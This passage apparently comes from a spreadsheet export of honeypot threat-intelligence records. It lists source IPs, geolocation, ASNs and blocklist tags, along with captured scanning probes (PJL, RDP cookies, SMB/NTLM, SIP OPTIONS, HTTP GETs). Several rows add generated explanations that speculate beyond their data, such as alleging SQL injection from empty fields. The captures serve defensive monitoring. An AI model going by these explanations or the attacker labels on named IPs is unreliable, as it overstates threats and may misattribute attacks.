mstshash=ezAcym'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PDhjwnjXJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fHMQZy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=npiOjo'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,60994)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,61000)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,61008)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wupMbRZmd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XWMGrQ'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,63258)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,63272)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,63282)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lkptDQUPk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DRszgI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rfWWla'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iWYRbRXYc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sllhpI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tZBIAb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TZNSeY'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f65"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No malicious activity detected, service unavailable or not monitored yet. No HTTP requests received for this service. Normal operational status of the service. &amp;&amp; The data suggests that there is an attempted access to a service, but it was not identified as malicious. The lack of activity data indicates that the attempt was unsuccessful or there was no interaction with the system. This could be indicative of reconnaissance or scanning activity. &amp;&amp; Possible brute-force login attempt via remote desktop connection, as RDP is often targeted by attackers for unauthorized access to systems. The fact that the RDP status is marked as NA (not available) suggests an unknown or unexpected state. This could indicate a potential security breach in progress. &amp;&amp; There is an attempt to access Microsoft SQL Server database, which could be a sign of a potential SQL injection attack or unauthorized access to sensitive data. This might indicate malicious activity aimed at exploiting vulnerabilities in the system's database management. The lack of access to MSSQL server data suggests that the attacker was attempting to access information they shouldn't have. &amp;&amp; There is no log data provided, so I have nothing to analyze or explain. &amp;&amp; The data suggests a potential brute force attack on a service using a well-known default community string, which could be an attempt to gain unauthorized access. This is because the attacker is likely trying multiple combinations of credentials. The use of a public community string indicates a lack of security configuration."/>
    <s v="Unknown Access &amp;&amp; LDAP Attack &amp;&amp; SNMP Bruteforce"/>
  </r>
  <r>
    <x v="287"/>
    <x v="287"/>
    <s v="ec2-18-97-5-1.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:19:48"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T02:19:48"/>
    <n v="98"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;53&amp;&amp;41208&amp;&amp;5432&amp;&amp;21&amp;&amp;389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-07"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;login&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2005-08-18 02:10:45"/>
    <s v="2027-01-16 04:59:59"/>
    <s v="2024-01-29 18:09:26"/>
    <s v="['NS-1321.AWSDNS-37.ORG', 'NS-1670.AWSDNS-16.CO.UK', 'NS-27.AWSDNS-03.COM', 'NS-967.AWSDNS-56.NET']"/>
    <s v="MarkMonitor Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited']"/>
    <s v="None"/>
    <x v="7"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:1261:501"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="288"/>
    <x v="288"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:15:38"/>
    <d v="2024-04-02T11:00:00"/>
    <d v="2025-04-30T02:15:38"/>
    <n v="357"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_POP3_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21&amp;&amp;22&amp;&amp;443&amp;&amp;5432&amp;&amp;9100&amp;&amp;445&amp;&amp;3306&amp;&amp;25&amp;&amp;80&amp;&amp;23&amp;&amp;110&amp;&amp;NA&amp;&amp;143&amp;&amp;3389"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;request&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.117.64:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.255.123.181:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=55385'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '91.194.11.82:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=14902'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 66.94.127.183:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.216,12190)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (YVyUUxSp,)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.8.69:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.181.21.224:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=33297'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.216,56374)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (BeZFksGy,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.42.176:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.79.122:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=2428'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=12120'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.42.176:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.8.69:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.216,53026)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (fewlrZrw,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=41342'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '149.102.153.168:443', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dd8"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="A malicious user is making a reconnaissance call to identify available services on the network, likely attempting to exploit vulnerabilities in SIP-based systems for further attacks or eavesdropping. The OPTIONS request with a large max-forwards value suggests an attempt to probe the network's maximum hop count, potentially enabling a reflection attack. This behavior is characteristic of port scanning and reconnaissance tactics used by malicious actors. &amp;&amp; An unknown client initiated an OPTIONS request to a networked system, potentially probing for vulnerabilities or services available on the target system. The request was likely sent from an external IP address and may be part of a reconnaissance scan. This activity could indicate malicious intent. &amp;&amp; There is insufficient information to analyze any potential malicious activity. &amp;&amp; Malicious activity detected: A request was made to a server with an unknown client IP address, attempting to access the root directory over HTTPS. The client is not specifying any specific service or resource. &amp;&amp; Unknown host is attempting a GET request to the root directory of a server, potentially trying to scan for vulnerabilities. The '*' in the Accept header suggests it may be a scanner or spider. This behavior could be indicative of reconnaissance activity."/>
    <s v="Port Scan &amp;&amp; Scanning Attack &amp;&amp; HTTP Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="289"/>
    <x v="289"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:15:06"/>
    <d v="2024-01-03T19:46:00"/>
    <d v="2025-04-30T02:15:06"/>
    <n v="190"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;5419&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="C"/>
    <s v="Buenos Aires F.D."/>
    <s v="Comuna 14"/>
    <s v="Buenos Aires (Palermo)"/>
    <s v="3435910"/>
    <s v="NA"/>
    <s v="-34.5752"/>
    <s v="-58.4359"/>
    <s v="7303"/>
    <s v="Telecom Argentina S.A."/>
    <s v="Telecom Argentina S.A"/>
    <s v="residential"/>
    <s v="Fibertel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,52775)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,52852)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60488)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60657)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60652)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,62013)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,61483)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,61877)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,56550)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,56751)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,65064)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,49468)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,64667)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,64784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,53597)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,53971)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60748)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,61444)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c859:aef3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The log indicates a potential attempt to access Microsoft SQL database management system, likely through brute force or unauthorized means. This could be part of a larger attack aimed at gaining sensitive information or disrupting database operations. The lack of successful login details suggests an attempted breach rather than a successful compromise."/>
    <m/>
  </r>
  <r>
    <x v="290"/>
    <x v="290"/>
    <s v="NA&amp;&amp;45-236-162-155.digitusinfo.com.br"/>
    <x v="0"/>
    <d v="2025-04-30T02:14:39"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T02:14:39"/>
    <n v="103"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Icaraí de Minas"/>
    <s v="Icaraí de Minas"/>
    <s v="3480766"/>
    <s v="NA"/>
    <s v="-16.2182"/>
    <s v="-44.9027"/>
    <s v="268241"/>
    <s v="DIGITUS INFORMATICA LTDA - ME"/>
    <s v="Digitus Informatica Ltda - ME"/>
    <s v="business"/>
    <s v="Digitus Informatica Ltda - ME"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,53838)}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,53904)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,55401)}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,55764)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2dec:a29b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is likely conducting a reconnaissance and scanning activity across various ports and services, attempting to identify vulnerabilities and potential entry points into the system. They are sending probes and queries to determine what services are running and how they can be exploited."/>
    <m/>
  </r>
  <r>
    <x v="291"/>
    <x v="291"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:13:19"/>
    <d v="2025-02-09T20:49:09"/>
    <d v="2025-04-30T02:13:19"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4"/>
    <s v="23&amp;&amp;41629&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
